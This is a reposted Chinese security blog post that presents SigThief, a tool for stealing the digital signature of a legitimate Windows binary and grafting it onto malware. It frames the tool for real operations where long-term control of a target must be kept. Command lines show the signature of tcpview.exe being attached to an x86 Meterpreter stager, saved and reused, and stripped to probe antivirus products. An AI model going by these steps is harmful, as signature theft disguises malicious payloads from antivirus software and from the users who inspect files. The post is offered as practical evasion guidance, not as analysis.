數字簽名偽造工具

本文轉載自查看原文 2021-02-06 19:22 420 安全

在實戰中，尤其是需要長期控制的目標，除免殺對抗安全軟件以外，還需考慮人為無意查看惡意文件，如數字簽名是否擁有。而許多安全軟件，又僅僅驗證是否有簽名，而非驗證簽名是否有效。

git地址： https://github.com/secretsquirrel/SigThief

從二進制文件獲得簽名並將其添加到另一個二進制文件

./sigthief.py -i tcpview.exe -t x86_meterpreter_stager.exe -o /tmp/msftesting_tcpview.exe

將簽名保存到磁盤供以后使用

./sigthief.py -i tcpview.exe -r #ouputfile tcpview.exe_sig

#使用保存的簽名數據簽名

./sigthief.py -s tcpview.exe_sig -t x86_meterpreter_stager.exe

#刪除簽名幫助找到重視簽名而不是代碼的AV

./sigthief.py -i tcpview.exe -T

#檢測簽名的有效性

./sigthief.py -i tcpview.exe -c

證書中所有信息一致，類似於程序被篡改證書失效

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 微軟數字簽名工具---SigCheck使用數字簽名原理數字簽名 Android 數字簽名你知道數字簽名嗎？數字簽名 Java實現數字簽名數字簽名實例基於RSA的數字簽名方案數字簽名與數字加密的區別